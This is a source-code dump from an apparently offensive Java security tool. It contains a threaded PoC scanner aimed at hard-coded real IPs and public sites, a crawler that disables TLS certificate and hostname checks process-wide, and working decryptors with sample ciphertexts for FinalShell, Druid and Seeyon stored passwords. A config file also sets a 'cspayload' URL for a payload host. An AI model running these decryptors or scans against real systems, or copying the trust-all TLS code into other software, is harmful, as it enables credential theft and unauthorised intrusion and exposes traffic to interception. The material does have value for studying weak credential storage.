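     *
     * @param pocname        path of the PoC yml file
     * @param url_list       target URLs
     * @param conditiontime  response-time condition passed to the match check
     * @param conditionwords keyword condition passed to the match check
     */
    public void getUriList(String pocname,String[] url_list,int conditiontime ,String conditionwords){
        List<Thread> workers = new ArrayList<>();
        for (String url : url_list) {
            // The target URL travels to the worker as the thread name.
            Thread worker = new Thread(new MyRunnable(pocname, conditiontime, conditionwords), url);
            worker.start();
            workers.add(worker);
        }
        try {
            for (Thread worker : workers) {
                worker.join();
            }
        } catch (InterruptedException e) {
            // Restore the flag so the caller can see the interruption.
            Thread.currentThread().interrupt();
        }
    }

    /** Worker that checks the URL stored in the current thread's name. */
    public static class MyRunnable implements Runnable {
        String pocname;
        String conditionwords;
        int conditiontime;

        public MyRunnable(String pocname,int conditiontime ,String conditionwords ){
            this.pocname = pocname;
            this.conditionwords = conditionwords;
            this.conditiontime = conditiontime;
        }

        @Override
        public void run() {
            String target = Thread.currentThread().getName();
            System.out.println(target + " start");
            new Url().addList(pocname, target, conditiontime, conditionwords);
            System.out.println(target + " end");
            // Print a copy taken under the lock; iterating the live list while another
            // worker appends to it can throw ConcurrentModificationException.
            System.out.println(Url.snapshot());
        }
    }

    public static class Url {

        private static Lock lock = new ReentrantLock();     // explicit lock guarding vullist

        public Url() {
        }

        /** Returns a copy of the results collected so far. */
        static List<String> snapshot() {
            lock.lock();
            try {
                return new ArrayList<>(vullist);
            } finally {
                lock.unlock();
            }
        }

        /**
         * Runs the PoC against one URL and appends the URL to the shared result list,
         * with the marker text added when the response meets the match condition.
         * A URL whose request failed or whose response could not be parsed is recorded
         * unmarked.
         *
         * @param pocname       path of the PoC yml file
         * @param url           target URL
         * @param conditiontime response-time condition
         * @param conditionword keyword condition; empty disables it
         */
        public void addList( String pocname,String url,int conditiontime,String conditionword){
            // Held for the whole call, network request included, so targets are
            // processed one at a time even though each has its own thread.
            lock.lock();
            try {
                // [0] response time text, [1] response headers and body.
                String[] final_list = new String[2];
                try {
                    // Read the yml file, build the request lines, substitute the target.
                    String[] explist = ymlFiletoexp(pocname);
                    String[][] requestHeader = exptoexp(explist);
                    String[][] requestHeader2 = inputurl(requestHeader, url);

                    // Decide by the scheme prefix; a substring test would also match a
                    // scheme that appears later in the URL, e.g. inside a query string.
                    String ishttps = url.startsWith("https://") ? "https" : "http";

                    Map<String, String> responseHeaderbody = listMakeRequest(requestHeader2 , ishttps);
                    for (Map.Entry<String, String> entry : responseHeaderbody.entrySet()) {
                        try {
                            String[] response = entry.getValue().split("ms\n");
                            final_list[0] = response[0].split(":")[1].split("ms")[0];
                            System.out.println("final_list[0]" +  final_list[0]);
                            final_list[1] = entry.getKey().replace("null:", "").replace("[", "").replace("]", "") + '\n' + response[1];
                        } catch (ArrayIndexOutOfBoundsException e) {
                            // Empty response body: keep whatever was parsed so far.
                        }
                    }
                } catch (Exception ex) {
                    // Best effort: a failed request leaves final_list unset and the URL
                    // is recorded as a non-match below.
                }

                if (isMatch(final_list, conditiontime, conditionword)) {
                    vullist.add(url + "``````````````````````````存在漏洞");
                } else {
                    // Includes the unparsable-time case, which previously stored an
                    // empty string and lost the URL.
                    vullist.add(url);
                }
            } finally {
                lock.unlock();
            }
        }

        /** Applies the keyword and response-time conditions to a parsed response. */
        private static boolean isMatch(String[] parsed, int conditiontime, String conditionword) {
            if (parsed[0] == null || parsed[1] == null) {
                return false;
            }
            int elapsed;
            try {
                elapsed = Integer.parseInt(parsed[0]);
            } catch (NumberFormatException e) {
                return false;
            }
            boolean wordHit = conditionword != null
                    && !conditionword.isEmpty()
                    && parsed[1].contains(conditionword);
            boolean timeHit = elapsed != 0
                    && elapsed >= conditiontime
                    && elapsed <= 1.5 * conditiontime;
            return wordHit || timeHit;
        }
    }

    public static void main(String[] args) {
        int conditiontime = 0;
        String conditionwords = "";
        String pocname = "poc/test/test.yml";
        String[] url_list = {"http://baidu.com","http://hao123.com","http://baidu2.com","http://hao1232.com","https://165.212.109.228","https://165.124.129.66"};
        test6test a = new test6test();
        a.getUriList(pocname, url_list,conditiontime,conditionwords);
    }

}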


--------------------------------------------------------------------------------
/src/main/RequestPoc/test7.java:
--------------------------------------------------------------------------------
  1 | package main.RequestPoc;
  2 | 
  3 | import java.io.BufferedReader;
  4 | import java.io.InputStreamReader;
  5 | import java.net.URL;
  6 | import java.net.URLConnection;
  7 | import java.security.KeyManagementException;
  8 | import java.security.NoSuchAlgorithmException;
  9 | import java.security.cert.X509Certificate;
 10 | import java.util.*;
 11 | import java.util.concurrent.ExecutorService;
 12 | import java.util.concurrent.Executors;
 13 | import java.util.concurrent.locks.Lock;
 14 | import java.util.concurrent.locks.ReentrantLock;
 15 | import java.util.regex.Matcher;
 16 | import java.util.regex.Pattern;
 17 | import javax.net.ssl.*;
 18 | import main.Poc2ExpguiController;
 19 | import static main.RequestPoc.Readfile.exptoexp;
 20 | import static main.RequestPoc.Readfile.ymlFiletoexp;
 21 | import static main.RequestPoc.makeRequest.inputurl;
 22 | import static main.RequestPoc.makeRequest.listMakeRequest;
 23 | import static main.RequestPoc.test7.Url.extractLists;
 24 | 
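public class test7 {
    static {
        try {
            test7.disableSSLCertificateChecking();
        } catch (NoSuchAlgorithmException | KeyManagementException e) {
            e.printStackTrace();
        }
    }

    /**
     * Replaces the JVM-wide {@code HttpsURLConnection} defaults with a socket factory
     * that accepts any certificate chain and a hostname verifier that accepts any host.
     *
     * <p>The change is process-wide, not per connection: every later
     * {@code HttpsURLConnection} in this JVM that does not install its own factory and
     * verifier is affected. Content fetched over HTTPS after this call is therefore
     * unauthenticated and can be altered by anyone on the network path, so it has to be
     * treated as untrusted input by whatever parses it.
     */
    private static void disableSSLCertificateChecking() throws NoSuchAlgorithmException, KeyManagementException {
        TrustManager[] trustAllCerts = new TrustManager[] {new X509TrustManager() {
            @Override
            public X509Certificate[] getAcceptedIssuers() {
                // The interface contract asks for a non-null, possibly empty array.
                return new X509Certificate[0];
            }

            @Override
            public void checkClientTrusted(X509Certificate[] certs, String authType) {
                // Accepts every chain: no exception means "trusted".
            }

            @Override
            public void checkServerTrusted(X509Certificate[] certs, String authType) {
                // Accepts every chain: no exception means "trusted".
            }
        }};
        SSLContext sc = SSLContext.getInstance("SSL");
        sc.init(null, trustAllCerts, new java.security.SecureRandom());
        HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());

        HostnameVerifier allHostsValid = new HostnameVerifier() {
            @Override
            public boolean verify(String hostname, SSLSession session) {
                return true;
            }
        };
        HttpsURLConnection.setDefaultHostnameVerifier(allHostsValid);
    }

    // Shared result list. Workers append while holding Url.lock; main reads it only
    // after every worker has been joined.
    public static List<String> vullist = new ArrayList<>();

    public test7() {
    }

    /**
     * Starts one thread per URL, each fetching that URL and collecting the paths found
     * in the response, and waits for all of them to finish.
     *
     * @param url_list URLs to fetch
     * @param pocname  despite the name, the regex prefix handed on to {@code extractLists}
     */
    public void getUriList( String[] url_list,String pocname){
        List<Thread> workers = new ArrayList<>();
        for (String url : url_list) {
            // The URL travels to the worker as the thread name.
            Thread worker = new Thread(new MyRunnable(pocname), url);
            worker.start();
            workers.add(worker);
        }
        try {
            for (Thread worker : workers) {
                worker.join();
            }
        } catch (InterruptedException e) {
            // Restore the flag so the caller can see the interruption.
            Thread.currentThread().interrupt();
        }
    }

    /** Worker that processes the URL stored in the current thread's name. */
    public static class MyRunnable implements Runnable {
        String pocname;

        public MyRunnable( String pocname){
            this.pocname = pocname;
        }

        @Override
        public void run() {
            String target = Thread.currentThread().getName();
            System.out.println(target + " start");
            new Url().addList(target, pocname);
            System.out.println(target + " end");
        }
    }

    public static class Url {

        // Character run that may follow the caller's prefix in a match.
        private static final String PATH_CHARS = "[a-zA-Z0-9_./-]{1,}";

        private static Lock lock = new ReentrantLock();     // explicit lock guarding vullist

        public Url() {
        }

        /**
         * Fetches {@code url} and appends every path extracted from the response to the
         * shared result list. Failures are ignored (best effort).
         *
         * @param url     URL to fetch
         * @param pocname regex prefix passed to {@link #extractLists}
         */
        public void addList( String url,String pocname){
            // Held for the whole call, network request included, so URLs are fetched
            // one at a time even though each has its own thread.
            lock.lock();
            try {
                vullist.addAll(extractLists(url, pocname));
            } catch (Exception ex) {
                // Best effort: a bad pattern or failed fetch contributes nothing.
            } finally {
                lock.unlock();
            }
        }

        /**
         * Fetches {@code url} and extracts the matching paths from the response body.
         *
         * @param url URL to fetch
         * @param pat regex prefix; see {@link #extractListsinput}
         * @return the distinct matches
         */
        public static Set<String> extractLists (String url ,String pat){
            return extractListsinput(sendGet(url), pat);
        }

        /**
         * Extracts every substring of {@code input} that matches {@code pat} followed by
         * one or more of the characters {@code a-z A-Z 0-9 _ . / -}.
         *
         * <p>{@code pat} is compiled as a regular expression as given, so a malformed
         * value throws {@code PatternSyntaxException}. {@code input} is usually a remote
         * response and is treated as plain text only.
         *
         * @param input text to search
         * @param pat   regex prefix
         * @return the distinct matches with {@code "}, {@code <} and {@code &} removed;
         *         matches containing {@code *} are skipped
         */
        public static Set<String> extractListsinput (String input ,String pat){
            Set<String> response_uri_lists = new HashSet<>();

            String pattern = pat + PATH_CHARS;
            System.out.println(pattern);

            Matcher m = Pattern.compile(pattern).matcher(input);
            while (m.find()) {
                String single_uri = m.group().trim()
                        .replace("\"", "")
                        .replace("<", "")
                        .replace("&", "");
                if (!single_uri.contains("*")) {
                    response_uri_lists.add(single_uri);
                }
            }
            return response_uri_lists;
        }

        /**
         * Sends a GET request and returns the response body with line breaks removed.
         *
         * @param url URL to fetch; URLs containing {@code /heapdump} are skipped
         * @return the body text, {@code ""} for a skipped URL, or the fixed error text
         *         when the request fails
         */
        public static String sendGet(String url) {
            if (url.contains("/heapdump")){
                return "";
            }
            try {
                URLConnection connection = new URL(url).openConnection();
                connection.setRequestProperty( "user-agent" , "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;SV1)");
                // Without timeouts an unresponsive server blocks this thread forever,
                // and with it every other worker waiting on the shared lock.
                connection.setConnectTimeout(5000);
                connection.setReadTimeout(5000);
                connection.connect();

                StringBuilder body = new StringBuilder();
                try (BufferedReader in = new BufferedReader(new InputStreamReader(
                        connection.getInputStream()))) {
                    String line;
                    while ((line = in.readLine()) != null) {
                        body.append(line);
                    }
                }
                return body.toString();
            } catch (Exception e) {
                System.out.println("发送请求出现异常!" + e);
                return "发送请求出现异常!";
            }
        }
    }

    public static void main(String[] args) {
        String url = "";

        String pattern = "(http[s]{0,1}://.*?)/|(http[s]{0,1}://.*)";

        String total = "";
        String pat = ""; // prefixes to match, one per line
        if (pat.contains(".")){
            // Turn "org.\nnet." into "(org\..*?|net\..*?)".
            String[] pats = pat.split("\n");
            for( String str: pats) {
                total = total + str.replace(".", "\\.");
                total = total + ".*?|";
            }
            pat = "(" + total.substring(0,total.length()-1) + ")";
        }else{
            if (pat.equals(""))
                pat = "/";
        }

        String black_lists = ".html\n.ftl\n//"; // substrings that exclude a result

        Matcher m = Pattern.compile(pattern).matcher(url);
        if (!m.find()) {
            // group() on a failed match throws IllegalStateException.
            System.out.println("url does not start with http:// or https://");
            return;
        }
        // Scheme plus host. Taking the capture group instead of trimming the last
        // character of the whole match keeps the host intact when the URL has no path.
        String host = m.group(1) != null ? m.group(1) : m.group(2);

        Set<String> response = Url.extractLists(url, pat);
        String[] url_list = response.toArray(new String[0]);

        for (int i = 0; i < url_list.length; i++) {
            test7.vullist.add(url_list[i]);
            if (!url_list[i].contains("http"))
                url_list[i] = host + url_list[i];
        }

        test7 a = new test7();
        a.getUriList( url_list , pat );

        String[] blacklists = black_lists.split("\n");
        Set<String> total_lists = new HashSet<>();

        for (String found : test7.vullist) {
            boolean isblack = false;
            // An empty blacklist would split into [""], which every string contains.
            if (!black_lists.equals("")) {
                for (String str : blacklists) {
                    if (found.contains(str))
                        isblack = true;
                }
            }
            if (!isblack)
                total_lists.add(found.trim());
        }

        StringBuilder total2 = new StringBuilder();
        for (String found : total_lists) {
            total2.append(found).append("\n");
        }
        System.out.println(total2);
    }
}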


--------------------------------------------------------------------------------
/src/main/finalshelltest/Oracledecode.java:
--------------------------------------------------------------------------------
  1 | package main.finalshelltest;
  2 | 
  3 | import java.io.ByteArrayInputStream;
  4 | import java.io.ByteArrayOutputStream;
  5 | import java.io.IOException;
  6 | import java.util.zip.ZipEntry;
  7 | import java.util.zip.ZipInputStream;
  8 | import java.util.zip.ZipOutputStream;
  9 | // 不一定是oracle的,只是看到了使用zip加密加密字符串
 10 | 
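/**
 * Round-trips short strings through a "ZIP entry, then Base64" text encoding.
 *
 * <p>The encoded form is one ZIP entry named {@code "0"} whose content is the text, Base64-encoded.
 * No key is involved: this is compression plus encoding, so anyone who can read an encoded value
 * can recover the text. Values stored this way should be handled as plaintext.
 */
public class Oracledecode {
    // Explicit charset so the result does not depend on the platform default; ASCII text is unaffected.
    private static final java.nio.charset.Charset TEXT_CHARSET =
            java.nio.charset.StandardCharsets.UTF_8;

    public static void main(String[] args) {
        System.out.println(unzip("UEsDBBQACAgIAK5QqUoAAAAAAAAAAAAAAAABAAAAMCtJLS4BAFBLBwgMfn/YBgAAAAQAAAA="));
    }

    /**
     * Compresses a string into a single-entry ZIP and Base64-encodes it.
     *
     * @param str text to compress; may be {@code null}
     * @return the Base64 text (wrapped at 76 columns, ending with a line separator),
     *         or {@code null} when {@code str} is {@code null} or writing fails
     */
    public static final String zip(String str) {
        if (str == null) {
            return null;
        }
        String lineSeparator = System.lineSeparator();
        try (ByteArrayOutputStream out = new ByteArrayOutputStream();
             ZipOutputStream zout = new ZipOutputStream(out)) {
            zout.putNextEntry(new ZipEntry("0"));
            zout.write(str.getBytes(TEXT_CHARSET));
            zout.closeEntry();
            // Snapshot before the stream is closed: the bytes stop after the entry's data
            // descriptor and carry no central directory, which is also how the sample in main()
            // is laid out. unzip() reads entries sequentially, so it does not need one.
            byte[] compressed = out.toByteArray();
            // java.util.Base64 replaces the JDK-internal sun.misc encoder (absent from JDK 9+);
            // the MIME encoder plus a final separator keeps the line-wrapped shape of the output.
            return java.util.Base64
                    .getMimeEncoder(76, lineSeparator.getBytes(java.nio.charset.StandardCharsets.US_ASCII))
                    .encodeToString(compressed) + lineSeparator;
        } catch (IOException e) {
            return null;
        }
    }

    /**
     * Base64-decodes a value and returns the content of its first ZIP entry.
     *
     * <p>NOTE(review): the decompressed size is not bounded. If values can come from a source
     * that is not trusted, cap the number of bytes read so a tiny input cannot expand into a
     * very large buffer.
     *
     * @param compressedStr Base64 text as produced by {@link #zip(String)}; may be {@code null}
     * @return the decompressed text; an empty string when the bytes contain no ZIP entry;
     *         {@code null} when the input is {@code null}, is not valid Base64, or reading fails
     */
    public static final String unzip(String compressedStr) {
        if (compressedStr == null) {
            return null;
        }
        try {
            // The MIME decoder skips line breaks, so wrapped input is accepted.
            byte[] compressed = java.util.Base64.getMimeDecoder().decode(compressedStr);
            try (ZipInputStream zin = new ZipInputStream(new ByteArrayInputStream(compressed));
                 ByteArrayOutputStream out = new ByteArrayOutputStream()) {
                zin.getNextEntry();
                byte[] buffer = new byte[1024];
                int count;
                while ((count = zin.read(buffer)) != -1) {
                    out.write(buffer, 0, count);
                }
                return new String(out.toByteArray(), TEXT_CHARSET);
            }
        } catch (IOException | IllegalArgumentException e) {
            // Malformed Base64 or a corrupt entry: report "cannot decode" the same way as before.
            return null;
        }
    }
}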
109 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/druid1016after.java:
--------------------------------------------------------------------------------
 1 | package main.finalshelltest;
 2 | 
 3 | import com.alibaba.druid.filter.config.ConfigTools;
 4 | 
/**
 * Decrypts a Druid datasource password by passing an explicit public key to {@code ConfigTools}.
 *
 * <p>The only inputs are the public key and the ciphertext, which are normally stored side by
 * side in the datasource configuration. Reading that configuration is therefore enough to recover
 * the password; database credentials that need protection belong in a secrets store with
 * restricted access, not in this format.
 */
public class druid1016after {
    public static void main(String[] args) throws Exception {
        // Reference (not executed) for how a matching pair is produced:
        //   String[] keyPair = ConfigTools.genKeyPair(512);          // [0] private key, [1] public key
        //   String cipher    = ConfigTools.encrypt(keyPair[0], plainPassword);
        //   String plain     = ConfigTools.decrypt(keyPair[1], cipher);
        //
        // Another sample ciphertext:
        //   HShsmthuOQtUyzlXNu2f8prK1/NEI/RcKjTWSFg1mBI/bFchRYJs9p32etYEEe9UsDDk8jKDsm6/RP5Yr+s8Cg==

        final String publicKeyBase64 = "MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAIhmJn/IljtzrVJRdMFmCdMMTHzf7lnIRH5KgZ9jMdmK1ZeTO39fqaCBIvA6eE3BwX7inS9w9UejKku5D6TJDoUCAwEAAQ==";
        final String encryptedPassword = "M9gTODvsTFcUFMuPJHOb4JMrVKwHHrh8tp2iEoPQ7F85t5ez4ZGe0l/GRMAkidVyion7WQch79FCcBHmCvPS9w==";

        String recovered = ConfigTools.decrypt(publicKeyBase64, encryptedPassword);
        System.out.println(recovered);
        // Marker line printed after the decrypted value.
        System.out.println("111");
    }
}
37 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/druidOutputpassword.java:
--------------------------------------------------------------------------------
 1 | package main.finalshelltest;
 2 | 
 3 | import com.alibaba.druid.filter.config.ConfigTools;
 4 | 
/**
 * Decrypts a Druid datasource password with the single-argument {@code ConfigTools.decrypt}.
 *
 * <p>No key is supplied, so decryption relies on whatever key the library itself provides.
 * A ciphertext that decrypts this way is protected by nothing the deployment controls and
 * should be rotated and moved to a per-deployment key or a secrets store.
 */
public class druidOutputpassword {
    public static void main(String[] args) throws Exception {
        // Other sample ciphertexts:
        //   rKYM0eaAc99uCtsMLLS9GQq9ty5q1yuRLmqFvxgQFfEhtqWxk+ctceVZlZ3Euh+Cx1b1wSM5VPUz66CkmwNdqw==
        //   DtZrDfgC+aEicYlH09WoJC6ptuHvj5YQdStXhNHKeV7CvpX5psusl0UDK4236TC0/1GxzdkHE39vPFCkjXLLgA==
        final String encryptedPassword = "hbZoFfr14R2yGuWJwbUtYdXjF40Df5sXbHSJYzGECsK0p1W4bmrM64SJKU0rmWo+yjUSrtU1Drb+0eGhQT3Xlg==";

        String recovered = ConfigTools.decrypt(encryptedPassword);
        System.out.println(recovered);
        // Marker line printed after the decrypted value.
        System.out.println("1111");
    }
}
15 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/finalshellDecode.java:
--------------------------------------------------------------------------------
  1 | package main.finalshelltest;
  2 | 
  3 | import java.io.*;
  4 | import java.math.BigInteger;
  5 | import java.security.MessageDigest;
  6 | import java.security.NoSuchAlgorithmException;
  7 | import java.security.SecureRandom;
  8 | import java.util.Base64;
  9 | import java.util.Random;
 10 | 
 11 | import javax.crypto.Cipher;
 12 | import javax.crypto.SecretKey;
 13 | import javax.crypto.SecretKeyFactory;
 14 | import javax.crypto.spec.DESKeySpec;
 15 | 
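/**
 * Recovers the plaintext of a password saved by the FinalShell client.
 *
 * <p>A stored value is Base64 of an 8-byte header followed by DES ciphertext. The DES key is
 * computed from that header alone (a fixed constant, {@link Random} and MD5), so the stored value
 * contains everything needed to decrypt it. Saved connection files therefore have to be protected
 * like plaintext passwords: restrict access to them and prefer key-based authentication.
 */
public class finalshellDecode {
    /** Number of leading bytes that hold the key-derivation header. */
    private static final int HEAD_LENGTH = 8;

    public static void main(String[] args) throws Exception {
        // Batch variant (disabled): read src/main/2.txt line by line and print
        // decodePass(line) for every line.
        System.out.println(decodePass("MEc5E0ksO1kOJL4+CVQCvxPgE6KCj8ji"));
    }

    /**
     * Decrypts {@code data} with single DES.
     *
     * @param data ciphertext
     * @param head key material; {@link DESKeySpec} uses its first 8 bytes
     * @return the decrypted bytes
     * @throws Exception if the key is too short or the ciphertext cannot be decrypted
     */
    public static byte[] desDecode(byte[] data, byte[] head) throws Exception {
        SecretKey key = SecretKeyFactory.getInstance("DES").generateSecret(new DESKeySpec(head));
        // "DES" without mode/padding takes the provider defaults; this must stay as written to
        // remain compatible with existing stored values.
        Cipher cipher = Cipher.getInstance("DES");
        cipher.init(Cipher.DECRYPT_MODE, key);
        return cipher.doFinal(data);
    }

    /**
     * Decodes one stored password.
     *
     * @param data Base64 text of header plus ciphertext; may be {@code null}
     * @return the plaintext, or {@code null} when {@code data} is {@code null}
     * @throws IllegalArgumentException if {@code data} is not valid Base64 or is shorter than the header
     * @throws Exception if decryption fails
     */
    public static String decodePass(String data) throws Exception {
        if (data == null) {
            return null;
        }
        byte[] buf = Base64.getDecoder().decode(data);
        if (buf.length < HEAD_LENGTH) {
            throw new IllegalArgumentException(
                    "encoded value holds " + buf.length + " bytes, expected at least " + HEAD_LENGTH);
        }
        byte[] head = new byte[HEAD_LENGTH];
        System.arraycopy(buf, 0, head, 0, head.length);
        byte[] cipherText = new byte[buf.length - head.length];
        System.arraycopy(buf, head.length, cipherText, 0, cipherText.length);

        byte[] plain = desDecode(cipherText, ranDomKey(head));
        // Explicit charset so the result is the same on every machine.
        // NOTE(review): assumes the client stores UTF-8 text - confirm against a non-ASCII sample.
        return new String(plain, java.nio.charset.StandardCharsets.UTF_8);
    }

    /**
     * Derives the 16-byte key material from the 8-byte header.
     *
     * <p>The order of the generator calls below is part of the format and must not change.
     *
     * @param head the 8 header bytes
     * @return MD5 of eight big-endian longs built from the header and the generators
     * @throws ArithmeticException if the divisor drawn from {@code head[5]} is zero
     */
    static byte[] ranDomKey(byte[] head) {
        long divisor = (long) new Random((long) head[5]).nextInt(127);
        long ks = 3680984568597093857L / divisor;
        Random random = new Random(ks);

        // head[0] is a signed byte: negative values skip nothing.
        int skip = head[0];
        for (int i = 0; i < skip; ++i) {
            random.nextLong();
        }

        Random r2 = new Random(random.nextLong());
        long r2First = r2.nextLong();
        long r2Second = r2.nextLong();
        long afterSeed = random.nextLong();
        long[] ld = {
            (long) head[4], r2First, (long) head[7], (long) head[3],
            r2Second, (long) head[1], afterSeed, (long) head[2]
        };

        // ByteBuffer is big-endian by default, the same byte order DataOutputStream.writeLong uses.
        java.nio.ByteBuffer keyData = java.nio.ByteBuffer.allocate(ld.length * Long.BYTES);
        for (long value : ld) {
            keyData.putLong(value);
        }
        return md5(keyData.array());
    }

    /**
     * Computes the MD5 digest of {@code data}.
     *
     * @param data bytes to hash
     * @return the 16-byte digest
     * @throws IllegalStateException if the runtime has no MD5 implementation
     */
    public static byte[] md5(byte[] data) {
        try {
            MessageDigest digest = MessageDigest.getInstance("MD5");
            digest.update(data, 0, data.length);
            return digest.digest();
        } catch (NoSuchAlgorithmException e) {
            // Fail here with the cause instead of returning null and failing later in DESKeySpec.
            throw new IllegalStateException("MD5 is not available", e);
        }
    }
}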
114 | 


--------------------------------------------------------------------------------
/src/main/finalshelltest/seeyonGetpass.java:
--------------------------------------------------------------------------------
 1 | package main.finalshelltest;
 2 | 
 3 | 
 4 | import java.io.IOException;
 5 | import java.util.Base64;
 6 | import sun.misc.BASE64Decoder;
 7 | import sun.misc.BASE64Encoder;
 8 | 
 9 | 
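/**
 * Decodes a stored Seeyon database password: Base64-decode the value, then shift every character
 * down by one code point.
 *
 * <p>Both steps are fixed, keyless transformations, so the stored form is an encoding rather than
 * encryption. Any configuration file holding such a value should be access-controlled as if it
 * held the plaintext password.
 */
public class seeyonGetpass {
    private static final String SrcData = "dGZzd2ZzcGIzLzYyOTQyNQ==";

    /** Prints {@code s} behind a fixed arrow prefix. */
    public static void log(String s) {
        System.out.println("------>" + s);
    }

    public static void main(String[] args) throws Exception {
        String shifted = jdkBas64Decode2(SrcData);
        log("jdk base64Decode2:" + shifted);
        log(asciiToString(stringToAscii(shifted)));
    }

    /**
     * Lists the code of every character minus one, joined by commas.
     *
     * @param value text to convert
     * @return e.g. {@code "97,98,99"} for {@code "bcd"}; empty for empty input
     */
    public static String stringToAscii(String value) {
        StringBuilder codes = new StringBuilder();
        for (int i = 0; i < value.length(); i++) {
            if (i > 0) {
                codes.append(',');
            }
            // The stored text has every character raised by one; undo that here.
            codes.append((int) value.charAt(i) - 1);
        }
        return codes.toString();
    }

    /**
     * Turns a comma-separated list of character codes back into text.
     *
     * @param value codes as produced by {@link #stringToAscii(String)}
     * @return the text; empty for empty input
     * @throws NumberFormatException if an element is not an integer
     */
    public static String asciiToString(String value) {
        // "".split(",") yields one empty element, which parseInt would reject.
        if (value.isEmpty()) {
            return "";
        }
        StringBuilder text = new StringBuilder();
        for (String code : value.split(",")) {
            text.append((char) Integer.parseInt(code));
        }
        return text.toString();
    }

    // Base64-encode with java.util.Base64; charset fixed so the result is platform-independent.
    private static String jdkBas64Encode2(String src) {
        return Base64.getEncoder().encodeToString(src.getBytes(java.nio.charset.StandardCharsets.UTF_8));
    }

    // Base64-decode with java.util.Base64; charset fixed so the result is platform-independent.
    public static String jdkBas64Decode2(String encodeData) {
        return new String(Base64.getDecoder().decode(encodeData), java.nio.charset.StandardCharsets.UTF_8);
    }
}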
59 | 


--------------------------------------------------------------------------------
/src/main/javafxtest/ListViewTest.java:
--------------------------------------------------------------------------------
 1 | package main.javafxtest;
 2 | 
 3 | import java.io.File;
 4 | import javafx.application.Application;
 5 | import javafx.event.ActionEvent;
 6 | import javafx.event.EventHandler;
 7 | import javafx.scene.Scene;
 8 | import javafx.scene.control.Button;
 9 | import javafx.scene.control.ListView;
10 | import javafx.scene.control.SelectionMode;
11 | import javafx.scene.layout.Pane;
12 | import javafx.scene.layout.VBox;
13 | import javafx.stage.Stage;
14 | 
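/** Scratch program that prints the entries of a fixed directory, leaving out .DS_Store files. */
public class ListViewTest {

    public static void main(String[] args) {
        String dirname = "/Users/f0ngf0ng/JAVA/seeyontest/poc/";
        File[] files = new File(dirname).listFiles();
        // listFiles() returns null when the path is missing or not a directory. An assert is
        // skipped unless the JVM runs with -ea, so check explicitly.
        if (files == null) {
            System.err.println("Not a readable directory: " + dirname);
            return;
        }
        for (File entry : files) {
            // Skips any entry whose absolute path contains ".DS_Store" past index 0.
            if (entry.getAbsolutePath().indexOf(".DS_Store") > 0) {
                continue;
            }
            System.out.println(entry);
        }
    }
}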


--------------------------------------------------------------------------------
/src/main/resources/config.properties:
--------------------------------------------------------------------------------
1 | python2path=python
2 | python3path=python3
3 | cspayload=http://8.8.8.8/f0ng


--------------------------------------------------------------------------------
/src/main/resources/proxy.fxml:
--------------------------------------------------------------------------------
 1 | 
 2 | 
 3 | 
 4 | 
 5 | 
 6 | 
 7 | 
 8 | 
 9 | 
10 |    
11 |       
12 |